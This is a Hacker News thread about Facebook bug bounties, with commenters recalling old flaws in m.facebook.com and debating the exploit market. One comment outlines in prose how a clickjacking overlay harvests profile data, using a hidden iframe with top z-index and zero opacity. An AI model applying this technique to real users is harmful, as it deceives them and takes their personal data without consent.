
Facebook Bug Bounties – Unofficial Treasure Map - phwd
https://www.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001
======
downandout
He forgot to mention m.facebook.com . There have been many issues over the
years with the mobile site that didn't exist on the main site. Examples:

1) You could invite _anyone_ to a Facebook event via their Facebook ID by
simply doing an HTTP post of Facebook ID's to the event invitation script on
this domain, but not on the main site. For some reason, on the mobile site
they didn't implement the check to see if you were actually friends with the
invitee. Since FB sends an email to each invitee, this was an enormous
spamming loophole for quite a while.

2) For a long time, there was no frame-breaking script on m.facebook.com. You
could clickjack essentially anything on Facebook this way. Years ago I did a
proof-of-concept on this where I clickjacked a platform app authorization,
which let me receive the name, email, and other profile info of any user that
did nothing more than click the X button on an annoying overlay I put on the
screen.

~~~
update
> 2) For a long time, there was no frame-breaking script on m.facebook.com.
> You could clickjack essentially anything on Facebook this way. Years ago I
> did a proof-of-concept on this where I clickjacked a platform app
> authorization, which let me receive the name, email, and other profile info
> of any user that did nothing more than click the X button on an annoying
> overlay I put on the screen.

Do you still have a copy of this? I'd like to see it

~~~
downandout
Today it wouldn't work because they now have frame-breaking on m.Facebook.com.
But if you'd like to see the general template you can email me at the email in
my HN profile.

Basically, you position the iframe element over something that will be clicked
(such as an advertisement X button), set its z-index so that it is the topmost
element, and set its opacity to 0. You can even test to see when the click has
occurred by testing for when a certain element on your page has lost the
focus.

~~~
update
> Today it wouldn't work because they now have frame-breaking

Yeah. I just want to see what the original vulnerability looked like.

I bug hunt.

Thanks for the offer to email you, but, I'm transitioning away from E-Mail for
security reasons.

------
tetrep
Nice. Although I'm still on the fence about bug bounties at their current
price, as I can't help but see this as potentially manipulative, like
hackathons where a company owns what you make, this guided hacking seems to be
taking advantage of people's passions in order to underpay them for work.

But, I can't really say it's underpaid, as I have no idea what the black
market for exploits is like, so maybe they are fairly paid.

~~~
dsacco
_> > But, I can't really say it's underpaid, as I have no idea what the black
market for exploits is like, so maybe they are fairly paid._

There is no black market for isolated vulnerabilities in a single website.

[https://news.ycombinator.com/item?id=11249173](https://news.ycombinator.com/item?id=11249173)

~~~
ryanlol
That's not exactly true.

Plenty of profit to be made from hijacking facebook accounts, traffic, etc.

~~~
dsacco
I find this difficult to believe. The demand for a vulnerability is directly
proportional to its half-life. Facebook accounts are not like desktop
computers that can be harvested for a botnet.

I could see a e.g. XSS worm being useful for spreading an advertisement from
status to status, but there are two issues with that hypothesis: 1) Facebook
is centralized, so the flaw would have maybe 24 - 48 hours of utility and 2)
it's not even necessary to use a vulnerability to spread bullshit on Facebook
newsfeeds, so why pay for it?

The alternative claim is that someone would pay a lot of money for a security
vulnerability compromising a high value account belonging to a celebrity,
journalist, politician, etc. I still find this difficult to believe, because
there doesn't appear to be a historical precedent for it. Most such attacks
focus on brute-forcing a password or other authentication mechanism.

~~~
ryanlol
>I could see a e.g. XSS worm being useful for spreading an advertisement from
status to status, but there are two issues with that hypothesis: 1) Facebook
is centralized, so the flaw would have maybe 24 - 48 hours of utility and 2)
it's not even necessary to use a vulnerability to spread bullshit on Facebook
newsfeeds, so why pay for it?

Someone paid 100k to put an exploit pack on redtube for a couple of hours, I'm
sure they'd pay much more for a XSS worm allowing them to do the same on
facebook. The average value per install in western countries with
cryptolockers and FakeAV is really high.

>The alternative claim is that someone would pay a lot of money for a security
vulnerability compromising a high value account belonging to a celebrity,
journalist, politician, etc. I still find this difficult to believe, because
there doesn't appear to be a historical precedent for it. Most such attacks
focus on brute-forcing a password or other authentication mechanism.

I don't know, I used to regularly get requests from entertainment industry
businesses asking me to compromise competitors facebook accounts for obscene
amounts of money. Same goes for jealous ex boyfriends, even though the sums
offered by them only tended to be a couple of grand.

While certainly true for a plenty of other sites, the claim that there's no
market for FB bugs simply has zero basis in reality.

~~~
dsacco
You're actually in the industry, as I am, so I'm willing to suspend more
disbelief to verify what you're saying. You probably wouldn't be willing to
show evidence of these claims here on HN, but would you be willing to do so
privately? That might actually be sufficient to change my stance on Facebook
vulnerability value.

------
Lukas1994
"Facebook’s internal network where employees turn those gears so you can
scroll past that “10 Things You Love About Potatoes” BuzzFeed article one more
time."

------
spejson
So I assume they won't give a bounty, if somebody finds a bug like the
possibility of calling their testing tool trough a chat message?

~~~
eugeneionesco
Just report it. What are you losing if you do?

~~~
sochihi
time.

